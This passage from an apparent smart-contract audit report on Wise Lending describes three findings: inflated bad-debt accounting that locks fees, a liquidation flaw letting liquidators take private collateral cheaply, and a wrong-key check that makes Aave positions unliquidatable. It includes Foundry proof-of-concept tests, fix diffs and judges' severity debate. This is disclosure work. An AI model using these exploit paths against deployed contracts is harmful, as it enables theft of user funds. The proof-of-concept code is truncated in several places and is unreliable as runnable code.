Scenario 1: Due to a market crash, a position’s LTV goes above 100%. The position gets partially liquidated, incrementing totalBadDebtETH by x (bad debt from 1st liquidation) and setting badDebtPosition[_nftId] to x. The position gets partially liquidated again, this time incrementing totalBadDebtETH by y (bad debt from 2nd liquidation) and setting badDebtPosition[_nftId] to y. The resulting state:

totalBadDebtETH == x + y
badDebtPosition[_nftId] == y

Scenario 2: Due to a market crash, a position’s LTV goes above 100%. The position gets partially liquidated, incrementing totalBadDebtETH by x and setting badDebtPosition[_nftId] to x. The position gets partially liquidated again, but this time the totalBorrow is equal to bareCollateral (LTV == 100%) and thus no bad debt is created. Due to the condition on line 419, totalBadDebtETH will be incremented by 0, but badDebtPosition[_nftId] will be reset to 0. The resulting state:

totalBadDebtETH == x
badDebtPosition[_nftId] == 0

Note: Scenario 1 is more likely to occur since Scenario 2 requires the additional partial liquidation to result in an LTV of exactly 100% for the position.

As we can see, partial liquidations can lead to totalBadDebtETH being artificially inflated with respect to the actual bad debt created by a position.

When bad debt is created, it is able to be paid back via the FeeManager::paybackBadDebtForToken or FeeManager::paybackBadDebtNoReward functions. However, the maximum amount of bad debt that can be deducted during these calls is capped at the bad debt recorded for the position specified (badDebtPosition[_nftId]). Therefore, the excess “fake” bad debt can not be deducted from totalBadDebtETH, resulting in totalBadDebtETH being permanently greater than 0.

Below is the logic that deducts the bad debt created by a position when it is paid off via one of the payback functions mentioned above:


170:        unchecked {
171:            uint256 newBadDebt = currentBorrowETH
172:                - currentCollateralBareETH;
174:            _setBadDebtPosition( // @audit: badDebtPosition[_nftId] = newBadDebt
175:                _nftId,
176:                newBadDebt
177:            );
179:            newBadDebt > currentBadDebt // @audit: totalBadDebtETH updated with respect to change in badDebtPosition
180:                ? _increaseTotalBadDebt(newBadDebt - currentBadDebt)
181:                : _decreaseTotalBadDebt(currentBadDebt - newBadDebt);

The above code is invoked in the FeeManagerHelper::updatePositionCurrentBadDebt function, which is in turn invoked during both of the payback functions previously mentioned. You will notice that the above code properly takes into account the change in the bad debt of the position in question. I.e. if the badDebtPosition[_nftId] decreased (after being paid back), then the totalBadDebtETH will decrease as well. Therefore, the totalBadDebtETH can only be deducted by at most the current bad debt of a position. Returning to the previous example in Scenario 1, this means that totalBadDebtETH would remain equal to x, since only y amount of bad debt can be paid back.


In the event a position creates bad debt, partial liquidations of that position can lead to the global totalBadDebtETH state variable being artificially inflated. This additional “fake debt” can not be deducted from the global state when the actual bad debt of the position is paid back. Thus, the FeeManager::claimFeesBeneficial function will be permanently DOS-ed, preventing any beneficials from claiming fees in the FeeManager contract. Additionally, no new incentives are able to be distributed to incentive owners in this state. However, protocol fees can still be collected in this state via the permissionless FeeManager::claimWiseFees function, and since incentive owners and beneficials are the only entities able to claim these fees, this can lead to fees being permanently locked in the FeeManager contract.

Justification for Medium Severity

Although not directly affecting end users, the function of claiming beneficial fees and distributing new incentives will be permanently bricked. To make matters worse, anyone can continue to collect fees via the permissionless FeeManager::claimWiseFees function, which will essentially “burn” any pending or future fees by locking them in the FeeManager (assuming all previously gathered incentives have been claimed). This value is, therefore, leaked from the protocol every time additional fees are collected in this state.

Once this state is reached, any pending or future fees should ideally be left in the WiseLending contract, providing value back to the users instead of allowing that value to be unnecessarily “burned”. However, the permissionless nature of the FeeManager::claimWiseFees function allows bad actors to further grief the protocol during this state by continuing to collect fees.

Note: Once this state is reached, and WiseLending is made aware of the implications, all fees (for all pools) can be set to 0 by the master address. This would ensure that no future fees are sent to the FeeManager. However, this does not stop pending fees from being collected. Additionally, a true decentralized system (such as a DAO) would likely have some latency between proposing such a change (decreasing fee value) and executing that change. Therefore, any fees distributed during that period can be collected.

Proof of Concept

Place the following test in the contracts/ directory and run with forge test --match-path contracts/BadDebtTest.t.sol:

// SPDX-License-Identifier: -- WISE --

pragma solidity =0.8.24;

import "./WiseLendingBaseDeployment.t.sol";

contract BadDebtTest is BaseDeploymentTest {
    address borrower = address(0x01010101);
    address lender = address(0x02020202);

    uint256 depositAmountETH = 10e18; // 10 ether
    uint256 depositAmountToken = 10; // 10 ether
    uint256 borrowAmount = 5e18; // 5 ether

    uint256 nftIdLiquidator; // nftId of lender
    uint256 nftIdLiquidatee; // nftId of borrower

    uint256 debtShares;

    function _setupIndividualTest() internal override {

        // set token value for simple calculations
        MOCK_CHAINLINK_2.setValue(1 ether); // 1 token == 1 ETH
        assertEq(MOCK_CHAINLINK_2.latestAnswer(), MOCK_CHAINLINK_ETH_ETH.latestAnswer());
        // fund lender and borrower
        vm.deal(lender, depositAmountETH);
        deal(address(MOCK_WETH), lender, depositAmountETH);
        deal(address(MOCK_ERC20_2), borrower, depositAmountToken * 2);

    function testScenario1() public {
        // --- scenario is set up --- //

        // --- shortfall event/crash creates bad debt, position partially liquidated logging bad debt --- //

        // --- borrower gets partially liquidated again --- //

            debtShares * 2e16 / 1e18

        // --- global bad det increases again, but user bad debt is set to current bad debt created --- // 
        uint256 newTotalBadDebt = FEE_MANAGER_INSTANCE.totalBadDebtETH();
        uint256 newUserBadDebt = FEE_MANAGER_INSTANCE.badDebtPosition(nftIdLiquidatee);
        assertGt(newUserBadDebt, 0); // userBadDebt reset to new bad debt, newUserBadDebt == current_bad_debt_created
        assertGt(newTotalBadDebt, newUserBadDebt); // global bad debt incremented again
        // newTotalBadDebt = old_global_bad_debt + current_bad_debt_created
        // --- user bad debt is paid off, but global bad is only partially paid off (remainder is fake debt) --- // 

        // --- protocol fees can no longer be claimed since totalBadDebtETH will remain > 0 --- // 
        FEE_MANAGER_INSTANCE.claimFeesBeneficial(address(0), 0);

    function testScenario2() public {
        // --- scenario is set up --- // 

        // --- shortfall event/crash creates bad debt, position partially liquidated logging bad debt --- //
        // --- Position manipulated so second partial liquidation results in totalBorrow == bareCollateral --- //
        // borrower adds collateral


        // borrower gets partially liquidated again

            debtShares * 2e16 / 1e18
        uint256 collateral = SECURITY_INSTANCE.overallETHCollateralsBare(nftIdLiquidatee);
        uint256 debt = SECURITY_INSTANCE.overallETHBorrowBare(nftIdLiquidatee);
        assertEq(collateral, debt); // LTV == 100% exactly

        // --- global bad debt is unchanged, while user bad debt is reset to 0 --- // 
        uint256 newTotalBadDebt = FEE_MANAGER_INSTANCE.totalBadDebtETH();
        uint256 newUserBadDebt = FEE_MANAGER_INSTANCE.badDebtPosition(nftIdLiquidatee);

        assertEq(newUserBadDebt, 0); // user bad debt reset to 0
        assertGt(newTotalBadDebt, 0); // global bad debt stays the same (fake debt)

        // --- attempts to pay back fake global debt result in a noop, totalBadDebtETH still > 0 --- // 
        uint256 paybackShares = _tryToPayBackGlobalDebt();
        assertEq(LENDING_INSTANCE.userBorrowShares(nftIdLiquidatee, address(MOCK_WETH)), paybackShares); // no shares were paid back

        // --- protocol fees can no longer be claimed since totalBadDebtETH will remain > 0 --- //
        FEE_MANAGER_INSTANCE.claimFeesBeneficial(address(0), 0);

    function _setUpScenario() internal {
        // lender supplies ETH

        nftIdLiquidator = POSITION_NFTS_INSTANCE.mintPosition();

        LENDING_INSTANCE.depositExactAmountETH{value: depositAmountETH}(nftIdLiquidator);


        // borrower supplies collateral token and borrows ETH

        MOCK_ERC20_2.approve(address(LENDING_INSTANCE), depositAmountToken * 2);

        nftIdLiquidatee = POSITION_NFTS_INSTANCE.mintPosition();
        LENDING_INSTANCE.solelyDeposit( // supply collateral

        debtShares = LENDING_INSTANCE.borrowExactAmountETH(nftIdLiquidatee, borrowAmount); // borrow ETH


    function _marketCrashCreatesBadDebt() internal {
        // shortfall event/crash occurs

        MOCK_CHAINLINK_2.setValue(0.3 ether);

        // borrower gets partially liquidated

        MOCK_WETH.approve(address(LENDING_INSTANCE), depositAmountETH);

            debtShares * 2e16 / 1e18 + 1 


        // global and user bad debt is increased
        uint256 totalBadDebt = FEE_MANAGER_INSTANCE.totalBadDebtETH();
        uint256 userBadDebt = FEE_MANAGER_INSTANCE.badDebtPosition(nftIdLiquidatee);

        assertGt(totalBadDebt, 0); 
        assertGt(userBadDebt, 0);
        assertEq(totalBadDebt, userBadDebt); // user bad debt and global bad debt are the same

    function _tryToPayBackGlobalDebt() internal returns (uint256 paybackShares) {
        // lender attempts to pay back global debt
        paybackShares = LENDING_INSTANCE.userBorrowShares(nftIdLiquidatee, address(MOCK_WETH));
        uint256 paybackAmount = LENDING_INSTANCE.paybackAmount(address(MOCK_WETH), paybackShares);


        MOCK_WETH.approve(address(FEE_MANAGER_INSTANCE), paybackAmount);


        // global bad debt and user bad debt updated
        uint256 finalTotalBadDebt = FEE_MANAGER_INSTANCE.totalBadDebtETH();
        uint256 finalUserBadDebt = FEE_MANAGER_INSTANCE.badDebtPosition(nftIdLiquidatee);

        assertEq(finalUserBadDebt, 0); // user has no more bad debt, all paid off
        assertGt(finalTotalBadDebt, 0); // protocol still thinks there is bad debt

I would recommend updating totalBadDebtETH with the difference of the previous and new bad debt of a position in the WiseSecurity::checkBadDebtLiquidation function, similar to how it is done in the FeeManagerHelper::_updateUserBadDebt internal function.

Example implementation:

diff --git a/./WiseSecurity/WiseSecurity.sol b/./WiseSecurity/WiseSecurity.sol
index d2cfb24..75a34e8 100644
--- a/./WiseSecurity/WiseSecurity.sol
+++ b/./WiseSecurity/WiseSecurity.sol
@@ -424,14 +424,22 @@ contract WiseSecurity is WiseSecurityHelper, ApprovalHelper {
             uint256 diff = totalBorrow
                 - bareCollateral;

-            FEE_MANAGER.increaseTotalBadDebtLiquidation(
-                diff
-            );
+            uint256 currentBadDebt = FEE_MANAGER.badDebtPosition(_nftId);

+            if (diff > currentBadDebt) {
+                FEE_MANAGER.increaseTotalBadDebtLiquidation(
+                    diff - currentBadDebt
+                );
+            } else {
+                FEE_MANAGER.decreaseTotalBadDebtLiquidation(
+                    currentBadDebt - diff
+                );
+            }

Trust (judge) increased severity to High

vonMangoldt (Wise Lending) commented via duplicate issue #243:

This doesn’t lead to loss of user funds though. Hence, it should be downgraded since one could just migrate and redeploy after discovering that. Otherwise good find.

Foon256 (Wise Lending) commented via duplicate issue #243:

Would agree with that! This is a good insight, but users’ funds are never at risk. This is related to the feeManager and the fees taken from the protocol. Therefore, a Medium issue.

Alex the Entreprenerd (Appellate Court judge) commented:

Summary of the issue

When a market accrues bad debt, which can be inflated due to an accounting error, fees and incentives will no longer be distributed. Note: The discussion had quite a bit of back and forth, for this reason the whole conversation is pasted below:


Alex the Entreprenerd (Appellate Court lead judge) commented: This seems to be tied to a specific interpretation of this discussion we’ve had around loss of yield as high.

hickuphh3 (judge 2) commented: Fees would be considered as matured yield? Given that it extends beyond the protocol to beneficials and incentive owners, I’m leaning towards a high more than a medium.

Alex the Entreprenerd (Appellate Court lead judge) commented: Yes it would be considered matured. I don’t have an opinion on this report yet and will follow up later today with my notes.

Not fully made up my mind but here’s a couple of points:

For Medium: Loss of Yield -> There is no loss of principal so Med seems fine.

For High: The contract is not losing yield in some case, the contract is losing 100% of all yield. The contract is no longer serving it’s purpose.

External Conditions: Bad debt must be formed. Bad debt handling is part of the system design, so assuming this can happen is fair, and starting from a scenario in which this can happen is also fair.

That said, in reality, this may never happen.

My main point for downgrading is that while the contract is losing all of the yield, nothing beside that is impacted, not fully sure on this one.

LSDan (judge 3) commented: I’m aligned with high on this one. Even though the conditions that lead to it are rare and there are arguably external conditions in some scenarios, there is a direct loss of funds and the functional loss of a contract’s purpose. Once this situation occurs, there is no clean way back from it.

Alex the Entreprenerd (Appellate Court lead judge) commented: I think this is the issue where we will have some contention. I think the Sponsor interpretation is important to keep in mind as it’s pretty rational. I would like to think about it a bit more.

Alex the Entreprenerd (Appellate Court lead judge) commented: I’m leaning towards Med on this report, I think the Sponsors POV is valid.

There is an accounting error, it would not cause permanent loss of funds. It would be mitigated by deprecating the market and creating a new one.

My main argument is that if this was live, this would trigger a re-deploy but it would not trigger any white hat rescue operation, as funds would be safe.

hickuphh3 (judge 2) commented: #74: When we stick to the c4a rules to which we agreed, all the loss of fees are no user funds and therefore, should be treated differently.

The core argument for Medium severity is that fees are a secondary concern.

This goes against the supreme court decision where fees shouldn’t be treated as 2nd class citizens here.

Loss of fees should be regarded as an impact similar to any other loss of capital. Loss of real amounts depends on specific conditions and likelihood considerations.

Likelihood: Requirement of bad debt formation. Once there is, funds (fees) are permanently bricked.

There is an accounting error, it would not cause permanent loss of funds; it would be mitigated by deprecating the market and creating a new one.

The funds you are referring to are user funds? Separately, I don’t see how it would mitigate the bricking once it happens.

Alex the Entreprenerd (Appellate Court lead judge) commented: I don’t think that the ruling means that loss of fees should be treated as high at all times.

The main argument is that the broken accounting doesn’t create a state that is not recoverable:

  • Some fees are lost.
  • User deprecates market (raises interests or pauses).
  • Deployes new Market.
  • System resumes functioning as intended.

My main argument is that this would not cause a War Room, it would cause a deprecation that the system can handle.

hickuphh3 (judge 2) commented: In what cases/scenarios would loss of fees be high then? Most, if not all, won’t have a war room for protocol fees.

The reason I would consider to justify downgrading is the low likelihood of the external requirement of bad debt formation + >= 2 partial liquidations.

I would dissent and argue for high severity.

  • Permanent loss of unclaimed fees.
  • Blast radius: affects not just the protocol, but incentive owners and beneficiaries.

Had the fees gone only to the protocol, I’d lean a bit more towards Medium.

Is WiseLending immutable in a poolToken instance?

What contracts would have to be re-deployed?

Alex the Entreprenerd (Appellate Court lead judge) commented: Liquidation premium being denied could be a valid High loss of yield, loss of gas for refunds when the system entire goal is that (e.g. keepers, voting on Nouns).

Alex the Entreprenerd’s (Appellate Court lead judge) Input

The finding shows how in the specific case of liquidations with bad debt, a market will stop accounting for fees.

2 aggravating circumstances seem to be:

  • Inability to pause and replace each market.
  • The Math for bad debt is also wrong, leading to the inability to fix the bug.

This would still cause a loss of fees for a certain period of time, as the admin would eventually be able to set the market fees to either a state that would cause users to stop using it or 0 as a means to stop the loss.

I think that the accounting mistake is notable, and I understand the reasoning for raising severity.

That said, because we have to judge by impact of the finding, I believe Medium Severity to be most appropriate.

hickuphh3’s (judge 2) Input

I maintain my stance for High severity for the reasons I stated above:

  • Permanent loss of unclaimed fees.
  • Impact on protocol ecosystem: beneficiaries and incentive owners.

LSDan’s (judge 3) Input

I’m still of the opinion that High is most appropriate here. The impact is significant enough that raising the severity beyond medium makes sense.


The severity is kept at High Severity, with a non-unanimous verdict.

Additional Context by the Lead Judge

I recommend monitoring how this decision influences future decisions on severities, especially when it comes to a percentage loss of yield, an attacker having the button to cause a loss of yield, against this instance which is the permanent inability for the contract to record a gain of yield.

Wise Lending commented:

Mitigated here.

[H-04] Liquidators can pay less than required to completely liquidate the private collateral balance of an uncollateralized position

Submitted by nonseodion

When a user deposits in the WiseLending contract he can make a private deposit (pure) which allows his deposits not to be used as collateral or a normal deposit. He can also set his position to be collateralized or uncollateralized. If a position is collateralized, the normal deposit can be used as collateral and vice-versa.

When a user uncollateralizes his position, he can only use his private deposit as collateral. If the position becomes liquidatable, it means the private deposit can no longer cover the amount borrowed. In the call to getFullCollateralETH() below only the private collateral is returned immediately as full collateral if it is uncollateralized.


        ethCollateral = _getTokensInEth(

if (_isUncollateralized(_nftId, _poolToken) == true) {
            return ethCollateral;

In a liquidation, the amount to be liquidated is expressed as a percentage of the full collateral. In an uncollateralized position, the full collateral is the private collateral. The calculateWishPercentage() call calculates this percentage.


    function calculateWishPercentage( uint256 _nftId, address _receiveToken, uint256 _paybackETH, uint256 _maxFeeETH, uint256 _baseRewardLiquidation
    ) external view returns (uint256)
        uint256 feeETH = _checkMaxFee(

        uint256 numerator = (feeETH + _paybackETH)
            * PRECISION_FACTOR_E18;

        uint256 denominator = getFullCollateralETH(

        return numerator / denominator + 1;

The amount to be liquidated, i.e. the amount the liquidator receives, is calculated in _calculateReceiveAmount() using the percentage from calculateWishPercentage() and applied to the position’s pure collateral first in line 557 below.

It calculates the percentage of the user’s normal balance to be reduced in line 569 without checking if it is uncollateralized. If the amount it gets, i.e. potentialPureExtraCashout, is greater than zero and less than the current private balance (pureCollateral) in line 576, it is reduced from the private balance.


556:         if (pureCollateralAmount[_nftId][_receiveTokens] > 0) {
557:             receiveAmount = _withdrawPureCollateralLiquidation(
558:                 _nftId,
559:                 _receiveTokens,
560:                 _removePercentage
561:             );
562:         }
564:         uint256 potentialPureExtraCashout;
565:         uint256 userShares = userLendingData[_nftId][_receiveTokens].shares;
566:         uint256 pureCollateral = pureCollateralAmount[_nftId][_receiveTokens];
568:         if (pureCollateral > 0 && userShares > 0) {
569:             potentialPureExtraCashout = _calculatePotentialPureExtraCashout(
570:                 userShares,
571:                 _receiveTokens,
572:                 _removePercentage
573:             );
574:         }
576:         if (potentialPureExtraCashout > 0 && potentialPureExtraCashout <= pureCollateral) {
577:             _decreasePositionMappingValue(
578:                 pureCollateralAmount,
579:                 _nftId,
580:                 _receiveTokens,
581:                 potentialPureExtraCashout
582:             );
584:             _decreaseTotalBareToken(
585:                 _receiveTokens,
586:                 potentialPureExtraCashout
587:             );
589:             return receiveAmount + potentialPureExtraCashout;
590:         }

The issue is the implementation applies the percentage meant for only the private collateral to both the normal and private collateral. It should reduce only the private collateral, but may also reduce the public collateral and send it to the liquidator.

Here’s how a malicious liquidator can profit and steal user funds:

  1. User deposits $100 worth of WETH in his private balance and $100 worth of WETH in his normal balance.
  2. He uncollateralizes his position and borrows $70 worth of WBTC.
  3. If the price of WBTC he borrowed goes up to $100, he can be liquidated.
  4. Assuming no liquidation fees, the liquidator pays $50 WBTC to liquidate $50 WETH (50%) from the user’s private balance leaving $50.
  5. The 50% is applied to the user’s public balance giving $50. This is also deducted from the private balance leaving $0 in the private balance.
  6. The liquidator ends up paying only $50 to earn $50 extra.

A liquidator can set it up to drain the private collateral balance and only pay for a portion of the liquidation. The user ends up losing funds and the protocol’s bad debt increases.


This vulnerability allows the liquidator to steal the user’s balance and pay for only a portion of the shares. It has these effects:

  1. The user loses funds.
  2. The amount of bad debt in the protocol is increased.

Proof of Concept

The testStealPureBalance() test below shows a liquidator earning more than the amount he paid for liquidation. The test can be put in any test file in the contracts directory and ran there.

pragma solidity =0.8.24;

import "forge-std/Test.sol";

import {WiseLending, PoolManager} from "./WiseLending.sol";
import {TesterWiseOracleHub} from "./WiseOracleHub/TesterWiseOracleHub.sol";
import {PositionNFTs} from "./PositionNFTs.sol";
import {WiseSecurity} from "./WiseSecurity/WiseSecurity.sol";
import {AaveHub} from "./WrapperHub/AaveHub.sol";
import {Token} from "./Token.sol";
import {TesterChainlink} from "./TesterChainlink.sol";

import {IPriceFeed} from "./InterfaceHub/IPriceFeed.sol";
import {IERC20} from "./InterfaceHub/IERC20.sol";
import {IWiseLending} from "./InterfaceHub/IWiseLending.sol";

import {ContractLibrary} from "./PowerFarms/PendlePowerFarmController/ContractLibrary.sol";

contract WiseLendingTest is Test, ContractLibrary {

  WiseLending wiseLending;
  TesterWiseOracleHub oracleHub;
  PositionNFTs positionNFTs;
  WiseSecurity wiseSecurity;
  AaveHub aaveHub;
  TesterChainlink wbtcOracle;

  // users/admin
  address alice = address(1);
  address bob = address(2);
  address charles = address(3);
  address lendingMaster;

  address wbtc;

  function setUp() public {
    lendingMaster = address(11);

    address ETH_PRICE_FEED = 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419;
    address UNISWAP_V3_FACTORY = 0x1F98431c8aD98523631AE4a59f267346ea31F984;
    address AAVE_ADDRESS = 0x87870Bca3F3fD6335C3F4ce8392D69350B4fA4E2;
    // deploy oracle hub
    oracleHub = new TesterWiseOracleHub(
      oracleHub.ETH_USD_PLACEHOLDER(), // set USD/ETH feed heartbeat

    // deploy position NFT
    positionNFTs = new PositionNFTs(

    // deploy Wiselending contract
    wiseLending = new WiseLending(

    // deploy AaveHub
    aaveHub = new AaveHub(
    // deploy Wisesecurity contract
    wiseSecurity = new WiseSecurity(

    // set labels
    vm.label(address(wiseLending), "WiseLending");
    vm.label(address(positionNFTs), "PositionNFTs");
    vm.label(address(oracleHub), "OracleHub");
    vm.label(address(wiseSecurity), "WiseSecurity");
    vm.label(alice, "Alice");
    vm.label(bob, "Bob");
    vm.label(charles, "Charles");
    vm.label(wbtc, "WBTC");
    vm.label(WETH, "WETH");

    // create tokens, create TestChainlink oracle, add to oracleHub
    (wbtc, wbtcOracle) = _setupToken(18, 17 ether);
    oracleHub.setHeartBeat(wbtc, 1);
    wbtcOracle.setRoundData(0, block.timestamp -1);
    // setup WETH on oracle hub
    oracleHub.setHeartBeat(WETH, 60 minutes);
    oracleHub.addOracle(WETH, IPriceFeed(ETH_PRICE_FEED), new address[](0));
    // create pools
        allowBorrow: true,
        poolToken: wbtc, // btc
        poolMulFactor: 17500000000000000,
        poolCollFactor: 805000000000000000,
        maxDepositAmount: 1800000000000000000000000

        allowBorrow: true,
        poolToken: WETH, // btc
        poolMulFactor: 17500000000000000,
        poolCollFactor: 805000000000000000,
        maxDepositAmount: 1800000000000000000000000

  function _setupToken(uint decimals, uint value) internal returns (address token, TesterChainlink oracle) {
    Token _token = new Token(uint8(decimals), alice); // deploy token
    TesterChainlink _oracle = new TesterChainlink( // deploy oracle
      value, 18
    oracleHub.addOracle( // add oracle to oracle hub
      new address[](0)

    return (address(_token), _oracle);

  function testStealPureBalance() public {
    // deposit WETH in private and public balances for Alice's NFT
    deal(WETH, alice, 100 ether);
    IERC20(WETH).approve(address(wiseLending), 100 ether);
    uint aliceNft = positionNFTs.reservePosition();
    wiseLending.depositExactAmount(aliceNft, WETH, 50 ether);
    wiseLending.solelyDeposit(aliceNft, WETH, 50 ether);
    // deposit for Bob's NFT to provide WBTC liquidity
    deal(wbtc, bob, 100 ether);
    IERC20(wbtc).approve(address(wiseLending), 100 ether);
    wiseLending.depositExactAmountMint(wbtc, 100 ether);

    // Uncollateralize Alice's NFT position to allow only private(pure)
    // balance to be used as collateral
    wiseLending.unCollateralizeDeposit(aliceNft, WETH);
    (, , uint lendCollFactor) = wiseLending.lendingPoolData(WETH);
    uint usableCollateral = 50 ether *  lendCollFactor * 95e16 / 1e36 ;
    // alice borrows
    uint borrowable = oracleHub.getTokensFromETH(wbtc, usableCollateral) - 1000;
    uint paybackShares = wiseLending.borrowExactAmount(aliceNft, wbtc, borrowable);

    // increase the price of WBTC to make Alice's position liquidatable
    wbtcOracle.setValue(20 ether); 
    // let charles get WBTC to liquidate Alice
    uint charlesNft  = positionNFTs.reservePosition();
    uint paybackAmount = wiseLending.paybackAmount(wbtc, paybackShares);
    deal(wbtc, charles, paybackAmount);
    IERC20(wbtc).approve(address(wiseLending), paybackAmount);

    uint wbtcBalanceBefore = IERC20(wbtc).balanceOf(charles);
    uint wethBalanceBefore = IERC20(WETH).balanceOf(charles);
    // charles liquidates 40% of the shares to ensure he can reduce the pure collateral balance twice
    wiseLending.liquidatePartiallyFromTokens(aliceNft, charlesNft, wbtc, WETH, paybackShares * 40e16/1e18);

    uint wbtcBalanceChange = wbtcBalanceBefore - IERC20(wbtc).balanceOf(charles);
    uint wethBalanceChange = IERC20(WETH).balanceOf(charles) - wethBalanceBefore;
    // The amount of WETH Charles got is 2x the amount of WBTC he paid plus fees (10% of amount paid)
    // WBTC paid plus fees = 110% * wbtcBalanceChange
    // x2WBTCChangePlusFees = 2 * WBTC paid plus fees
    uint x2WBTCChangePlusFees = oracleHub.getTokensInETH(wbtc, 11e17 * wbtcBalanceChange / 1e18) * 2;
    assertApproxEqAbs(wethBalanceChange, x2WBTCChangePlusFees, 200);

To ensure the code does not also consider the normal balance at all we can check if the position is uncollateralized early. Currently, this check is done but is done too late in the _calculateReceiveAmount() function. We can fix it by moving the check.


+        if (userLendingData[_nftId][_receiveTokens].unCollateralized == true) {
+            return receiveAmount;
+        }
         uint256 potentialPureExtraCashout;
         uint256 userShares = userLendingData[_nftId][_receiveTokens].shares;
         uint256 pureCollateral = pureCollateralAmount[_nftId][_receiveTokens];

-        if (userLendingData[_nftId][_receiveTokens].unCollateralized == true) {
-            return receiveAmount;
-        }
         return _withdrawOrAllocateSharesLiquidation(

Assessed type

Invalid Validation

vm06007 (Wise Lending) commented:

Edge case - if user is about to be liquidated, I think they will make things collateralized to avoid liquidation. Either way we would like to see this as Medium. Fix is already applied. This is also something that’s been explored in the hats.finance competition; hence, 564-566 lines came from there etc.

Trust (judge) commented:

High is appropriate, especially with the PoC demonstrated.

Wise Lending commented:

Mitigated here.

[H-05] Wrong use of nftID to check if a PowerFarm position is an Aave position

Submitted by nonseodion, also found by 0xStalin

When a PowerFarm position is created its keyId is used as a key in the isAave mapping to indicate if it is an Aave position or not. The keyId is the index of the Power Farm NFT linked with the position.


        isAave[keyId] = _isAave;

The keyId is also linked with another nftId. This other nftId is used to hold the keyIds Power Farm position in the WiseLending contract. They are linked together in the farmingKeys mapping of the MinterReserver contract.


        uint256 keyId = _getNextReserveKey();

        reservedKeys[_userAddress] = keyId;
        farmingKeys[keyId] = _wiseLendingNFT;

The issue is the check if a position is an Aave position is done using the WiseLending nftId instead of the Power Farm’s keyId. This occurs five times in the code:

It is used in getLiveDebtRatio() to know the pool token borrowed so the borrowShares can be retrieved.


        uint256 borrowShares = isAave[_nftId]
            ? _getPositionBorrowSharesAave(
            : _getPositionBorrowShares(

It is used in _manuallyPaybackShares() to know the pool token to pay back.


        if (isAave[_nftId] == true) {
            poolAddress = AAVE_WETH_ADDRESS;

It is used in checkDebtRatio() to know the pool token borrowed so the borrowShares can be retrieved.


uint256 borrowShares = isAave[_nftId]
            ? _getPositionBorrowSharesAave(
            : _getPositionBorrowShares(

It is used in _coreLiquidation() to select a token to payback and to know the pool token borrowed so the borrowShares can be retrieved.


address paybackToken = isAave[_nftId] == true
            ? AAVE_WETH_ADDRESS
            : WETH_ADDRESS;

        paybackAmount = WISE_LENDING.paybackAmount(

uint256 cutoffShares = isAave[_nftId] == true
            ? _getPositionBorrowSharesAave(_nftId)
                * FIVTY_PERCENT
                / PRECISION_FACTOR_E18
            : _getPositionBorrowShares(_nftId)
                * FIVTY_PERCENT
                / PRECISION_FACTOR_E18;

These have the following effects:

  • For getLiveDebtRatio(), users would get zero when they try to retrieve their debt ratio.
  • For _manuallyPaybackShares() users won’t be able to pay back their shares manually from the PowerFarm contract since it’ll fetch zero shares as borrow shares.
  • The last two instances are used in liquidation and allow a malicious user to have a position that can’t be liquidated even though it is eligible for liquidation. The malicious user can:

    1. Create an Aave PowerFarm position.
    2. The position becomes eligible for liquidation after some price changes.
    3. Liquidators cannot liquidate the position because the call to _coreLiquidation first calls checkDebtRatio() which uses the wrong borrowShares to calculate the debt ratio and returns true. Thus, causing a revert.


        if (_checkDebtRatio(_nftId) == true) {
            revert DebtRatioTooLow();


  1. Malicious users can open positions that can’t get liquidated.
  2. Users can’t pay back manually when it is an Aave position.
  3. getLiveDebtRatio() returns zero always when it is an Aave position.

Proof of Concept

There are 3 tests below and they can all be run in PendlePowerFarmControllerBase.t.sol.

  • testAaveGetLiveDebtRatio() shows that getLiveDebtRatio() returns zero.
  • testAaveManuallyPayback() shows that borrowed tokens can’t be paid back using manuallyPaybackShares().
  • testCannotLiquidate() shows that Aave positions cannot be liquidated.
    function testAaveGetLiveDebtRatio() public cheatSetup(true){
        uint256 keyID = powerFarmManagerInstance.enterFarm(
            1 ether,
            15 ether,

        uint nftId = powerFarmManagerInstance.farmingKeys(keyID);
        // gets borrow shares of weth instead of aeth
        uint ratio = powerFarmManagerInstance.getLiveDebtRatio(nftId);
        assertEq(ratio, 0);

    function testAaveManuallyPayback() public cheatSetup(true){
        uint256 keyID = powerFarmManagerInstance.enterFarm(
            1 ether,
            15 ether,

        uint nftId = powerFarmManagerInstance.farmingKeys(keyID);
        uint borrowShares = wiseLendingInstance.getPositionBorrowShares(nftId, AWETH);
        // tries to payback weth instead of aweth and reverts with an arithmetic underflow
        // since the position has 0 weth borrow shares
        powerFarmManagerInstance.manuallyPaybackShares(keyID, borrowShares);
    error DebtRatioTooLow();
    function testCannotLiquidate() public cheatSetup(true){
        uint256 keyID = powerFarmManagerInstance.enterFarm(
            1 ether,
            15 ether,

        // increase collateral factors to make position eligible for liquidation
        wiseLendingInstance.setPoolParameters(AWETH, 99e16, type(uint256).max); // increasw Wiselending coll factor
        vm.store(address(powerFarmManagerInstance), bytes32(uint(2)), bytes32(uint(99e16))); //increasw PowerFarm coll factor
        assertEq(powerFarmManagerInstance.collateralFactor(), 99e16);

        uint nftId = powerFarmManagerInstance.farmingKeys(keyID);
        uint borrowShares = wiseLendingInstance.getPositionBorrowShares(nftId, AWETH);
        // will revert if it can't be liquidated
        wiseSecurityInstance.checksLiquidation(nftId, AWETH, borrowShares);

        uint nftIdLiquidator = positionNftsInstance.mintPosition();

        powerFarmManagerInstance.liquidatePartiallyFromToken(nftId, nftIdLiquidator, borrowShares );

Consider checking if a position is an Aave position using the keyId of the position.


-       uint256 borrowShares = isAave[_nftId]
+       uint256 borrowShares = isAave[keyId]
            ? _getPositionBorrowSharesAave(
            : _getPositionBorrowShares(


-       if (isAave[_nftId] == true) {
+       if (isAave[keyId] == true) {
            poolAddress = AAVE_WETH_ADDRESS;


-        uint256 borrowShares = isAave[_nftId]
+        uint256 borrowShares = isAave[keyId]
            ? _getPositionBorrowSharesAave(
            : _getPositionBorrowShares(


-        address paybackToken = isAave[_nftId] == true
+        address paybackToken = isAave[keyId] == true
            ? AAVE_WETH_ADDRESS
            : WETH_ADDRESS;

        paybackAmount = WISE_LENDING.paybackAmount(

-       uint256 cutoffShares = isAave[_nftId] == true
+       uint256 cutoffShares = isAave[keyId] == true
            ? _getPositionBorrowSharesAave(_nftId)
                * FIVTY_PERCENT
                / PRECISION_FACTOR_E18
            : _getPositionBorrowShares(_nftId)
                * FIVTY_PERCENT
                / PRECISION_FACTOR_E18;

vm06007 (Wise Lending) commented:

While this is marked as High, we would like to bring this to a Medium, as there is still a way to liquidate such nft/user should that even occur (depending if there’s AavePool present etc).

